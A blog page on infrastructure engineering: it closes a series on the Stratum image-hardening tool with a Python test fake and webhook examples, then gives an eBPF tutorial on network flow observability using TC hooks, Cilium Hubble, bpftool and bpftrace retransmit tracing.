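Before registering a plugin against real infrastructure, it can help to exercise the build lifecycle against a fake. This is a sketch under stated assumptions:

- BaseProvider below is a local stand-in that mirrors the three methods shown above. The real stratum.providers base class may define more.
- InMemoryProvider and build are hypothetical.
- harden_and_scan stands in for the Ansible-Lockdown and OpenSCAP steps.

The try/finally in build is the point: a failed scan still terminates the build instance.

```python
from __future__ import annotations

import itertools
from abc import ABC, abstractmethod


class BaseProvider(ABC):
    """Local stand-in for stratum.providers.BaseProvider (assumed shape)."""
    name = "base"

    @abstractmethod
    def provision_build_instance(self, blueprint, config): ...

    @abstractmethod
    def create_image(self, instance_id, blueprint, grade): ...

    @abstractmethod
    def terminate_instance(self, instance_id): ...


class InMemoryProvider(BaseProvider):
    """Fake cloud for testing build orchestration without real instances."""
    name = "in-memory"

    def __init__(self):
        self._ids = itertools.count(1)
        self.running: set[str] = set()
        self.images: dict[str, dict] = {}

    def provision_build_instance(self, blueprint, config):
        instance_id = f"i-{next(self._ids)}"
        self.running.add(instance_id)
        return instance_id, {"host": "127.0.0.1"}

    def create_image(self, instance_id, blueprint, grade):
        image_id = f"img-{next(self._ids)}"
        # Compliance metadata travels with the image record
        self.images[image_id] = {"blueprint": blueprint["name"], "grade": grade}
        return image_id

    def terminate_instance(self, instance_id):
        self.running.discard(instance_id)


def build(provider: BaseProvider, blueprint: dict, config: dict, harden_and_scan) -> str:
    """Drive one build; the build instance is terminated even if scanning fails."""
    instance_id, conn = provider.provision_build_instance(blueprint, config)
    try:
        grade = harden_and_scan(conn)  # hypothetical hardening + OpenSCAP step
        return provider.create_image(instance_id, blueprint, grade)
    finally:
        provider.terminate_instance(instance_id)


p = InMemoryProvider()
image = build(p, {"name": "ubuntu22-cis"}, {}, lambda conn: "A")
print(image, p.images[image])  # img-2 {'blueprint': 'ubuntu22-cis', 'grade': 'A'}


def failing_scan(conn):
    raise RuntimeError("scan failed")


try:
    build(p, {"name": "ubuntu22-cis"}, {}, failing_scan)
except RuntimeError:
    pass
print(p.running)  # set(): the failed build's instance was still cleaned up
```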

3. Pipeline Integrations

Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:

# Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}
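To check what a gate-failure notification will say before wiring up the webhook, you can mirror the template logic in plain Python. The sketch assumes the event carries the fields the template references: image_id, grade, min_grade, and failing_controls. The Slack side uses an incoming webhook's JSON body of the form {"text": ...}. The URL is a placeholder, and the request is built but not sent.

```python
from __future__ import annotations

import json
import urllib.request


def gate_failure_text(event: dict) -> str:
    """Plain-Python equivalent of the pipeline_gate_failure template above."""
    lines = [
        f"Image {event['image_id']} failed compliance gate.",
        f"Grade: {event['grade']} (required: {event['min_grade']})",
        "Top failing controls:",
    ]
    for control in event["failing_controls"][:3]:  # same [:3] slice as the template
        lines.append(f"- {control['id']}: {control['title']}")
    return "\n".join(lines)


def slack_request(webhook_url: str, text: str) -> urllib.request.Request:
    """Build (but do not send) a POST for a Slack incoming webhook."""
    body = json.dumps({"text": text}).encode("utf-8")
    return urllib.request.Request(
        webhook_url, data=body, method="POST",
        headers={"Content-Type": "application/json"},
    )


event = {  # illustrative event, not real scan output
    "image_id": "ami-0example",
    "grade": "B",
    "min_grade": "A",
    "failing_controls": [
        {"id": "CUSTOM-001", "title": "Audit log retention"},
        {"id": "CIS-1", "title": "Example control one"},
        {"id": "CIS-2", "title": "Example control two"},
        {"id": "CIS-3", "title": "Example control three"},
    ],
}
text = gate_failure_text(event)
req = slack_request("https://example.invalid/webhook", text)
print(text)
# To send for real: urllib.request.urlopen(req, timeout=10)
```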

The Open-Core Model

Stratum follows the same model as the tools that have become infrastructure standards:

Tool | Open-core model
Terraform / OpenTofu | OSS core (OpenTofu, MPL 2.0; Terraform itself moved to the BSL in 2023), enterprise features in paid tier
Cilium / Isovalent | Core OSS, enterprise support/features in paid tier
Vault / HCP Vault | Source-available core (BSL since 2023), hosted/enterprise in paid tier
Stratum | Engine + blueprint + scanner + Pipeline API: Apache 2.0

Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.

The repository is at: github.com/rrskris/Stratum


What This Series Taught

EP01 — EP06 in one view:

Episode | What you learned | What Stratum does
EP01 | Default AMIs are insecure by design | Replaces default AMI with a hardened golden image
EP02 | Blueprint as code: the 2am skip disappears | HardeningBlueprint YAML (5-step wizard or direct YAML)
EP03 | One blueprint, six providers, no drift | 6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox
EP04 | Automated OpenSCAP: grade at build time | Compliance Scanner: A-F, SARIF, drift detection
EP05 | CI/CD gate: the unhardened image never deploys | Pipeline API: POST /api/pipeline/scan
EP06 | The platform: OSS, self-hostable, extendable | Apache 2.0, Helm install, three extension points

What’s Next

This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.

If you’ve been following the eBPF: From Kernel to Cloud series, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.

The next series: Purple Team Playbook — real attack paths against cloud and Kubernetes infrastructure, how they’re detected, and how they’re closed. Starting May 8.

GitHub: github.com/rrskris/Stratum

Get the Purple Team series in your inbox → linuxcent.com/subscribe

Network Flow Observability — What Every Connection Reveals

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 10
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability


Architecture Overview

[Figure: eBPF network flow observability, Hubble and Cilium architecture for zero-instrumentation flow monitoring]
Hubble captures every packet decision at the eBPF layer: no sidecar, no app changes, no sampling.

TL;DR

  • Network flow observability with eBPF attaches persistent programs to TC hooks and records every connection attempt, retransmit, reset, and drop — continuously, with no sampling
    (TC hook = Traffic Control hook: the point in the Linux network stack where eBPF programs intercept packets after ingress or before egress, tied to a specific network interface)
  • APM tools and service mesh telemetry are interpretations of what happened; kernel-level flow data from TC hooks is the raw event stream they all derive from
  • Retransmit counters at the kernel level reveal congestion, half-open connections, and remote endpoint failures that application logs never surface
  • Cilium’s Hubble and similar tools (Pixie, Retina) are eBPF flow exporters: they attach eBPF programs (TC hooks, kprobes, or both, depending on the tool), collect events through a perf or ring buffer, and expose them over an API
  • You can verify what flow data a tool is actually collecting with four bpftool commands — without reading documentation
  • Production caution: flow maps grow with the number of active connections; pin and bound your maps, and account for the per-packet overhead on high-throughput interfaces

EP09 showed bpftrace as an on-demand kernel query tool — compile a question, get an answer, clean up. Network flow observability with eBPF is the persistent version: programs that stay attached to TC hooks across your entire fleet, recording every connection without waiting for you to ask. When a client reports intermittent failures that appear nowhere in application logs, that persistent record is what you query. This episode covers how that layer works and how to read it.

Quick Check: What Flow Data Is Your Cluster Already Collecting?

Before building anything new, check what’s already running. If you have Cilium, Pixie, or Retina on your cluster, eBPF flow programs are already attached:

# SSH into a worker node, then:

# What TC programs are attached to cluster interfaces?
bpftool net list

# Expected output on a Cilium node:
# xdp:
#
# tc:
# eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
# eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action

# What maps are those programs holding state in?
bpftool map list | grep -E "flow|conn|sock|nat"

# Sample output:
# 24: hash  name cilium_ct4_global  flags 0x0
#     key 24B  value 56B  max_entries 65536  memlock 4718592B
# 25: hash  name cilium_ct4_local   flags 0x0
#     key 24B  value 56B  max_entries 8192   memlock 589824B

Each lxcXXXX interface is the host-side end of a pod’s veth pair. The TC programs on those interfaces are what Cilium uses to enforce NetworkPolicy and collect flow telemetry. If you see prog_id values on pod interfaces, your cluster is already doing kernel-level flow collection.
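On a node with many pods, scanning that output by eye gets tedious. The stdlib-only sketch below parses bpftool net list text and returns the TC program IDs attached to each lxc interface. The regex matches the line shape shown above and also accepts an "id N" form. bpftool's text output varies between versions, though, so treat the pattern as an assumption (bpftool -j net list emits JSON if you would rather not parse text). An empty result suggests no eBPF CNI is attached to pod interfaces.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Matches tc lines such as "lxc12a3(15) clsact/ingress prog_id 41 prio 1 ...".
# Assumption: some bpftool versions print "id 41" (possibly after a program
# name) instead of "prog_id 41"; both forms are accepted.
TC_LINE = re.compile(
    r"^(?P<iface>[\w.@-]+)\((?P<ifindex>\d+)\)\s+clsact/(?P<direction>ingress|egress)"
    r"\b.*?\b(?:prog_)?id\s+(?P<prog_id>\d+)"
)


def pod_tc_programs(net_list_output: str, prefix: str = "lxc") -> dict[str, dict[str, int]]:
    """Map each host-side pod veth to its {direction: prog_id} TC attachments."""
    found: dict[str, dict[str, int]] = defaultdict(dict)
    for line in net_list_output.splitlines():
        match = TC_LINE.match(line.strip())
        if match and match["iface"].startswith(prefix):
            found[match["iface"]][match["direction"]] = int(match["prog_id"])
    return dict(found)


sample = """\
xdp:

tc:
eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action
"""
print(pod_tc_programs(sample))  # {'lxc12a3': {'ingress': 41, 'egress': 42}}
```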

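Not running Cilium? On a plain kubeadm or EKS node whose CNI does not use eBPF, bpftool net list will typically show no TC programs on pod interfaces. kube-proxy and iptables-based CNI plugins do their work in netfilter (iptables or IPVS), not at the TC hook. You can still attach your own flow programs. Create a clsact qdisc with tc qdisc add dev eth0 clsact, then load a program onto its ingress or egress hook with tc filter add dev eth0 ingress bpf da obj <object file> sec <section>. That TC hook is the attachment point the rest of this episode builds on.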


The client opened a ticket on a Tuesday afternoon. “Intermittent connection failures to the payment gateway. Started around 11 AM. Application logs say timeout. Retry logic is masking it for most users but the error rate is up 0.3%.”

I looked at the APM dashboard. The service showed elevated latency — p99 at 850ms versus a normal 120ms — but no hard errors at the application layer. The service mesh metrics showed the downstream call succeeding from the mesh’s perspective. The payment gateway team said their side looked clean.

Three tools. Three different answers. All of them interpreting the network. None of them were the network.

I ran:

bpftool map dump id 24 | grep -A5 "payment-gateway-ip"

The connection tracking map showed retransmit count 14 for a specific (src_ip, dst_ip, src_port, dst_port, protocol) 5-tuple: the same tuple, every 30 seconds, for 2 hours. The kernel was retransmitting. The TCP stack was compensating. The application was seeing sporadic success because retransmits eventually got through. The APM dashboard averaged that latency into a p99 and called it “elevated.”

The kernel had the truth. Everything above it was rounding.


Why Application-Level Metrics Miss What the Kernel Sees

Application metrics — APM spans, service mesh telemetry, load balancer health checks — operate at Layer 7. They measure round-trip time for complete requests, error codes returned, bytes transferred. They answer “did this request succeed?” not “what did the network do to make it succeed?”

The TCP stack underneath those requests handles retransmits, congestion window adjustments, RST packets, and half-open connections silently. From an application’s perspective, a request that required 3 retransmits before the ACK arrived is indistinguishable from one that succeeded on the first attempt, except that it took longer.

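This is structural, not a tooling gap. Application-layer observability tools cannot see below their own protocol boundary. The kernel’s TCP implementation does not report upward when it retransmits. It just retransmits. The per-socket counters exist, but only something that polls them (getsockopt with TCP_INFO, or ss -ti) or traces the kernel ever sees them.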

eBPF flow observability closes this gap by attaching programs directly to the network path — at the TC hook, which fires on every packet crossing a network interface — and recording what the kernel actually does.


How TC Hook Flow Programs Work

EP08 covered TC eBPF programs for pod network policy. Flow observability uses the same attachment point with a different purpose: instead of allowing or dropping packets, the program reads packet metadata and writes it to a map or ring buffer.

Pod sends packet
      ↓
veth interface (lxcXXXX)
      ↓
TC clsact/egress hook fires
      ↓
eBPF program reads:
  - src IP, dst IP
  - src port, dst port
  - protocol
  - packet size
  - TCP flags (SYN, ACK, FIN, RST) and sequence number; TCP has no retransmit flag, so a retransmit shows up as a repeated sequence number
      ↓
Writes event to ringbuf (or perf_event_array)
      ↓
Userspace consumer reads ringbuf
      ↓
Aggregates to flow record
      ↓
Exports to Hubble/Prometheus/flow store

ringbuf: a BPF ring buffer (BPF_MAP_TYPE_RINGBUF, kernel 5.8+). It is a multi-producer, single-consumer queue shared by all CPUs and drained by a userspace consumer. The kernel program reserves space, writes an event, and commits it; the userspace reader drains committed events. Newer tools prefer it to perf_event_array because one shared buffer avoids per-CPU over-allocation, preserves event ordering across CPUs, and the reserve/commit API saves an extra copy. Which buffer a given exporter uses, Hubble included, depends on the tool and its version; the map types in bpftool map list show what is actually in use.

The key structural property: the TC hook fires on every packet. Not sampled. Not throttled by default. Every SYN, every ACK, every RST, every retransmit. For flow observability, you typically aggregate at the program level — count packets and bytes per 5-tuple per second, rather than emitting an event per packet — but the raw visibility is there if you need it.
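Aggregating per 5-tuple per second is a simple reduction. The userspace sketch below performs it, assuming events have already been decoded into (timestamp, 5-tuple, length) records. In the kernel, the same fold is usually a BPF hash map keyed by the tuple and updated in place, so only summarized records cross into userspace. FiveTuple, FlowRecord, and aggregate are illustrative names, and the addresses reuse this episode's example endpoints.

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterable, NamedTuple


class FiveTuple(NamedTuple):
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int
    protocol: int  # IP protocol number: 6 = TCP, 17 = UDP


@dataclass
class FlowRecord:
    packets: int = 0
    byte_count: int = 0


def aggregate(
    events: Iterable[tuple[float, FiveTuple, int]], window_s: float = 1.0
) -> dict[tuple[int, FiveTuple], FlowRecord]:
    """Fold per-packet (timestamp, 5-tuple, length) events into per-window flow records."""
    flows: dict[tuple[int, FiveTuple], FlowRecord] = {}
    for ts, key, length in events:
        bucket = int(ts // window_s)  # which time window this packet falls in
        record = flows.setdefault((bucket, key), FlowRecord())
        record.packets += 1
        record.byte_count += length
    return flows


t = FiveTuple("10.244.1.5", "172.16.4.23", 48291, 443, 6)
events = [(0.10, t, 1500), (0.20, t, 1500), (0.90, t, 60), (1.05, t, 1500)]
flows = aggregate(events)
print(len(events), "events ->", len(flows), "records")  # 4 events -> 2 records
print(flows[(0, t)])  # FlowRecord(packets=3, byte_count=3060)
```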


What Retransmit Telemetry Actually Reveals

Most flow observability implementations track TCP retransmits specifically because they are the clearest signal of network-layer trouble invisible to applications.

A TCP retransmit happens when the sender concludes a segment was lost. If no ACK arrives within the retransmission timeout (RTO), the kernel resends the segment and doubles the timeout (exponential backoff). Duplicate ACKs or SACK information can also trigger a fast retransmit before the timer expires. From the application’s perspective, the call takes longer. If retransmits keep clearing, the application sees success: just slow success.
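The doubling adds up quickly. The small sketch below computes the timeout sequence. It assumes a 200 ms starting RTO, which is Linux's floor (TCP_RTO_MIN), and Linux's 120 s ceiling (TCP_RTO_MAX). On a real connection the starting value is derived from measured RTT, so the numbers are illustrative. Three back-to-back timeouts already cost 1.4 s, far beyond a 120 ms baseline.

```python
from __future__ import annotations

TCP_RTO_MIN_S = 0.2    # Linux floor for the retransmission timeout
TCP_RTO_MAX_S = 120.0  # Linux ceiling


def rto_schedule(initial_rto: float, retries: int, max_rto: float = TCP_RTO_MAX_S) -> list[float]:
    """Timeout waited before each successive retransmission, doubling up to max_rto."""
    schedule, rto = [], max(initial_rto, TCP_RTO_MIN_S)
    for _ in range(retries):
        schedule.append(rto)
        rto = min(rto * 2, max_rto)
    return schedule


delays = rto_schedule(0.2, 3)
print(delays)                 # [0.2, 0.4, 0.8]
print(round(sum(delays), 2))  # 1.4 seconds spent waiting on timeouts
```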

perf_event: a kernel mechanism for collecting performance data. In eBPF, BPF_MAP_TYPE_PERF_EVENT_ARRAY lets kernel programs push variable-length records to userspace readers through one ring buffer per CPU. Older tools use perf_event_array; newer ones increasingly use BPF_MAP_TYPE_RINGBUF (a single shared ring, more memory-efficient). bpftool map list shows which of the two map types a given flow exporter has created.

To observe retransmits directly with bpftrace:

# Count retransmit events per destination IP (IPv4 sockets), run for 60 seconds
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    // One-argument ntop() infers AF_INET from the 4-byte skc_daddr
    $daddr = ntop($sk->__sk_common.skc_daddr);
    @retransmits[$daddr] = count();
}
interval:s:60 { print(@retransmits); clear(@retransmits); exit(); }
'

Sample output:

Attaching 2 probes...
@retransmits[10.96.0.10]:   2       # DNS service — normal
@retransmits[172.16.4.23]:  847     # payment gateway endpoint ← problem here
@retransmits[10.244.1.5]:   1       # normal pod-to-pod traffic

847 retransmits to a single endpoint in 60 seconds. That’s not noise. That’s a congested or half-open connection being retried 14 times per second by the TCP stack while the application layer averages it into “elevated latency.”
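The per-second figure is just the interval count divided by the window length. The sketch below parses one interval's output (the format shown above, without the annotations) and ranks destinations by retransmit rate. The threshold of 1 retransmit per second is an arbitrary assumption; tune it for your traffic.

```python
from __future__ import annotations

import re

# bpftrace prints map entries as "@name[key]: count"; multi-key maps use "a, b, c".
MAP_LINE = re.compile(r"^@\w*\[(?P<key>[^\]]+)\]:\s+(?P<count>\d+)")


def retransmit_rates(output: str, window_s: float) -> dict[str, float]:
    """Retransmits per second for each map key in one bpftrace interval dump."""
    rates: dict[str, float] = {}
    for line in output.splitlines():
        match = MAP_LINE.match(line.strip())
        if match:
            rates[match["key"]] = int(match["count"]) / window_s
    return rates


def hot_destinations(rates: dict[str, float], threshold_per_s: float = 1.0) -> list[str]:
    """Keys above the threshold, worst first (the 1/s default is an assumption)."""
    hot = [key for key, rate in rates.items() if rate > threshold_per_s]
    return sorted(hot, key=lambda key: rates[key], reverse=True)


sample = """\
Attaching 2 probes...
@retransmits[10.96.0.10]:   2
@retransmits[172.16.4.23]:  847
@retransmits[10.244.1.5]:   1
"""
rates = retransmit_rates(sample, window_s=60)
print(round(rates["172.16.4.23"], 1))  # 14.1
print(hot_destinations(rates))         # ['172.16.4.23']
```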


How Cilium Hubble Collects Flow Data

Hubble is the flow observability layer built into Cilium. Understanding how it works lets you reason about what it can and cannot see, and verify what it’s actually collecting.

Hubble’s architecture:

Kernel (per node)
├── TC eBPF programs on all pod veth interfaces
│     write flow events → BPF event buffer (perf or ring buffer)
│
└── Hubble node agent (userspace)
      reads ringbuf
      enriches with pod metadata (Kubernetes API)
      exposes gRPC API

Cluster level
└── Hubble Relay
      aggregates per-node gRPC streams
      exposes single cluster-wide API

User tooling
└── hubble observe  /  Hubble UI  /  Prometheus exporter

The TC programs are writing raw packet events. The Hubble agent is the consumer that translates those events into Kubernetes-aware flow records — adding pod name, namespace, label, and policy verdict on top of the 5-tuple and TCP metadata the kernel provides.

To see the TC programs Cilium has attached to pod interfaces (the datapath programs whose events Hubble consumes):

# On any Cilium node
bpftool net list | grep lxc

# lxce4a1(23) clsact/ingress prog_id 61  ← Cilium datapath program, pod interface ingress
# lxce4a1(23) clsact/egress  prog_id 62  ← Cilium datapath program, pod interface egress
# lxcf7b2(31) clsact/ingress prog_id 63
# lxcf7b2(31) clsact/egress  prog_id 64

# Inspect one of those programs to see its type and the maps it uses
bpftool prog show id 61

# Output:
# 61: sched_cls  name tail_handle_nat  tag 3a8e2f1b4c7d9e0a  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 2144B  jited 1382B  memlock 4096B  map_ids 24,31,38
#     btf_id 142

sched_cls is the BPF program type for TC — confirming these are TC-attached flow programs. map_ids 24,31,38 — those are the maps this program reads from and writes to. You can dump any of them:

bpftool map dump id 24 | head -40

# Output (connection tracking entry):
# [{
#     "key": {
#         "saddr": "10.244.1.5",        # ← source pod IP
#         "daddr": "172.16.4.23",        # ← destination IP
#         "sport": 48291,                # ← source port
#         "dport": 443,                  # ← destination port
#         "nexthdr": 6,                  # ← protocol: TCP
#         "flags": 3                     # ← CT_EGRESS | CT_ESTABLISHED
#     },
#     "value": {
#         "rx_packets": 14832,           # ← packets received
#         "tx_packets": 14831,           # ← packets sent
#         "rx_bytes": 3841024,           # ← bytes received
#         "tx_bytes": 3756288,           # ← bytes sent
#         "lifetime": 21600,             # ← seconds until entry expires
#         "rx_closing": 0,
#         "tx_closing": 0
#     }
# }]

That’s the ground truth. Not an APM span. Not a service mesh metric. The actual per-connection counters that Cilium’s datapath maintains in a kernel map for that 5-tuple.


Writing a Minimal Flow Observer with bpftrace

You don’t need Cilium or Hubble to get flow telemetry. bpftrace can produce it directly on any node with BTF:

# Flow table: tcp_sendmsg calls per (process, destination IP, destination port), for 2 minutes
bpftrace -e '
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop($sk->__sk_common.skc_daddr);
    // skc_dport is in network byte order: swap both bytes, not just shift
    $dport = $sk->__sk_common.skc_dport;
    $dport = ($dport >> 8) | (($dport << 8) & 0x00FF00);
    @flows[comm, $daddr, $dport] = count();
}
interval:s:30 { print(@flows); clear(@flows); }
interval:s:120 { exit(); }
'

Sample output (every 30 seconds):

@flows[curl, 93.184.216.34, 443]:         12    # curl → example.com:443
@flows[coredns, 10.96.0.10, 53]:          341   # CoreDNS upstream queries
@flows[payment-svc, 172.16.4.23, 443]:   1204   # payment service → gateway
@flows[nginx, 10.244.2.3, 8080]:          89    # nginx → upstream pod
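skc_dport holds the destination port in network (big-endian) byte order. On a little-endian host (x86-64, and arm64 as usually configured), the raw 16-bit value comes back with its bytes swapped, so shifting right by 8 keeps only one byte of the port and a full swap is needed. The stdlib demonstration below uses port 443 and compares a bare shift with a full byte swap.

```python
import struct


def naive_port(raw: bytes) -> int:
    """Read network-order bytes as a little-endian u16, then shift right by 8."""
    (value,) = struct.unpack("<H", raw)
    return value >> 8


def swapped_port(raw: bytes) -> int:
    """Same little-endian read, followed by a full 16-bit byte swap."""
    (value,) = struct.unpack("<H", raw)
    return ((value >> 8) | ((value << 8) & 0xFF00)) & 0xFFFF


raw_443 = struct.pack("!H", 443)  # b'\x01\xbb': port 443 in network byte order
print(naive_port(raw_443), swapped_port(raw_443))  # 187 443
```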

For retransmit tracking specifically:

# Combined send + retransmit watcher, keyed by destination IP; runs until Ctrl-C
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    // Keyed by destination only: timer-driven retransmits run in softirq
    // context, so comm is often not the process that owns the socket
    @retx[ntop($sk->__sk_common.skc_daddr)] = count();
}
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    @sends[ntop($sk->__sk_common.skc_daddr)] = count();
}
interval:s:10 {
    printf("=== Retransmits vs sends (last 10s) ===\n");
    print(@retx);
    print(@sends);
    clear(@retx);
    clear(@sends);
}
'

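This gives you the volume of sends and the retransmit count side by side. The ratio tells you whether retransmits are a rounding error (around 0.01%) or a signal (5% and up). Treat it as approximate: tcp_sendmsg counts send calls, not segments, and one call can put many segments on the wire.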
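Turning the two printed maps into that ratio takes a join on the destination key. The sketch below assumes you have already parsed both maps into {destination: count} dicts keyed the same way; the counts are made up for illustration. The result is retransmits per send call, not per segment, so read it as an approximation.

```python
from __future__ import annotations


def retransmit_ratio(retx: dict[str, int], sends: dict[str, int]) -> dict[str, float]:
    """Retransmits per 100 tcp_sendmsg calls, for each destination with sends."""
    return {dst: 100.0 * retx.get(dst, 0) / n for dst, n in sends.items() if n > 0}


def is_signal(pct: float, threshold_pct: float = 5.0) -> bool:
    """True at or above the 5% level treated as a real signal."""
    return pct >= threshold_pct


# Illustrative counts for one 10-second interval (not measured data).
sends = {"172.16.4.23": 10000, "10.96.0.10": 20000}
retx = {"172.16.4.23": 847, "10.96.0.10": 2}
ratios = retransmit_ratio(retx, sends)
print({dst: round(pct, 2) for dst, pct in ratios.items()})
# {'172.16.4.23': 8.47, '10.96.0.10': 0.01}
print([dst for dst, pct in ratios.items() if is_signal(pct)])  # ['172.16.4.23']
```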


⚠ Production Gotchas

Map size bounds matter. Connection tracking maps have a fixed max_entries (65536 and 8192 in the sample map list above). On nodes with high connection churn (serverless, short-lived batch jobs), a full map either evicts older entries (LRU hash maps) or rejects new inserts (plain hash maps), and neither failure is visible to the application. bpftool map show id N reports max_entries; to see current occupancy, count the entries in bpftool map dump id N. Cilium exposes map utilization as cilium_bpf_map_pressure in Prometheus.
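Utilization is current entries divided by max_entries. The sketch below assumes you take max_entries from bpftool map show and the entry count from bpftool -j map dump id N, which prints a JSON array with one element per entry. pressure_alert and its 80% threshold are illustrative.

```python
from __future__ import annotations

import json


def count_entries(dump_json: str) -> int:
    """Count entries in a JSON map dump (a JSON array, one element per entry)."""
    return len(json.loads(dump_json))


def pressure_alert(entries: int, max_entries: int, warn_at: float = 0.8) -> str | None:
    """Warn once a map's utilization crosses warn_at (0.8 is an assumed threshold)."""
    if max_entries <= 0:
        raise ValueError("max_entries must be positive")
    pressure = entries / max_entries
    if pressure >= warn_at:
        return f"map at {pressure:.0%} of max_entries ({entries}/{max_entries})"
    return None


print(count_entries('[{"key": 1}, {"key": 2}]'))  # 2
# max_entries 8192 matches cilium_ct4_local in the sample map list above.
print(pressure_alert(7700, 8192))  # map at 94% of max_entries (7700/8192)
print(pressure_alert(1200, 8192))  # None
```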

Per-packet overhead on high-throughput interfaces. On a 10Gbps interface, a TC program can fire roughly 0.8 million times per second with 1500-byte frames and close to 15 million times per second with minimum-size frames. Aggregating at the program level (count per 5-tuple rather than emit per packet) keeps overhead manageable, and Cilium does this. A naive bpftrace one-liner that emits a perf event per packet will saturate the perf ring buffer under real load. Use ringbuf write paths or aggregate before emitting.

TC hook placement and direction confusion. Ingress TC on a pod’s veth (lxcXXXX) sees egress traffic from the pod’s perspective — because the host sees the packet arriving on the veth after the pod sent it. This reversal is consistent but confusing when you’re reading direction labels in flow records. EP08 covered this in detail for policy enforcement; the same asymmetry applies to flow data.

Retransmit counters reset on connection close. If you’re tracking retransmit totals for a long-lived connection, the count is stored in the kernel’s socket state and is cleared when the socket closes. For persistent tracking across reconnects, aggregate at the flow level in userspace before the connection closes.
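Those per-socket counters are visible from userspace, but only to code that asks for them. The Linux-only sketch below reads struct tcp_info through getsockopt(TCP_INFO), the same data ss -ti prints. The offsets follow the long-standing layout in linux/tcp.h, and tcp_retrans_counters is an illustrative helper. The example uses a loopback connection, so the retransmit counters should read zero.

```python
from __future__ import annotations

import socket
import struct

# struct tcp_info (linux/tcp.h) starts with 8 one-byte fields, followed by u32
# fields; tcpi_total_retrans is the 24th u32, so 8 + 24 * 4 = 104 bytes cover it.
TCP_INFO_LEN = 104


def tcp_retrans_counters(sock: socket.socket) -> dict[str, int]:
    """Read retransmit counters the kernel keeps in this socket's state (Linux only)."""
    raw = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_INFO, TCP_INFO_LEN)
    state, _ca_state, retransmits = struct.unpack_from("3B", raw, 0)
    u32 = struct.unpack_from("24I", raw, 8)
    return {
        "state": state,              # 1 == TCP_ESTABLISHED
        "retransmits": retransmits,  # consecutive timeout retransmits in progress
        "retrans": u32[7],           # retransmitted segments not yet acknowledged
        "total_retrans": u32[23],    # lifetime total; freed with the socket
    }


with socket.create_server(("127.0.0.1", 0)) as server:
    with socket.create_connection(server.getsockname()) as client:
        conn, _ = server.accept()
        with conn:
            client.sendall(b"ping")
            conn.recv(4)
            counters = tcp_retrans_counters(client)

print(counters)
```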

Hubble flow visibility requires pod interfaces. Hubble only sees traffic that crosses a pod’s veth interface. Node-to-node traffic that doesn’t involve a pod (e.g., node SSH, kubelet-to-API-server on the node IP) is not captured by default. For host-level network observability, you need a TC program on the physical interface (eth0, ens3), not just on pod veth pairs.


Quick Reference

What you want to see | Command
What TC programs are attached | bpftool net list
Which maps a program uses | bpftool prog show id N (check map_ids)
Connection tracking entries | bpftool map dump id N
Retransmits per destination | bpftrace -e 'kprobe:tcp_retransmit_skb { ... }'
Send calls per process and destination | bpftrace -e 'kprobe:tcp_sendmsg { ... }'
Hubble flow stream (Cilium) | hubble observe --follow
Hubble flows for one pod | hubble observe --pod mynamespace/mypod --follow
Verify map pressure | bpftool map show id N (max_entries) vs. an entry count from bpftool map dump id N

Kernel function | What it marks
tcp_sendmsg | Data being sent on a TCP socket
tcp_recvmsg | Data being received on a TCP socket
tcp_retransmit_skb | A segment being retransmitted
tcp_v4_send_reset, tcp_send_active_reset (tracepoint tcp:tcp_send_reset) | RST being sent
tcp_fin | FIN received from the peer (tcp_send_fin marks a locally initiated close)
tcp_connect | New outbound TCP connection attempt

Key Takeaways

  • Network flow observability with eBPF attaches TC programs that record every connection event continuously — not sampled, not throttled, not filtered by what the application reports
  • Retransmit telemetry from tcp_retransmit_skb reveals congestion and endpoint failures that are structurally invisible to application-layer monitoring tools
  • Cilium Hubble, Pixie, and Retina are all eBPF flow exporters: they attach eBPF programs (TC hooks, kprobes, or both), drain a perf or ring buffer, enrich with Kubernetes metadata, and expose the result over an API
  • You can verify what any flow tool is actually collecting with bpftool net list, bpftool map list, bpftool prog show, and bpftool map dump: four commands, no documentation needed
  • Map sizing and per-packet overhead are the two production concerns; aggregate at the kernel level, bound your maps, and monitor map pressure
  • The kernel’s connection tracking map is the ground truth. APM dashboards, service mesh metrics, and load balancer health checks are all interpretations of what that map contains

What’s Next

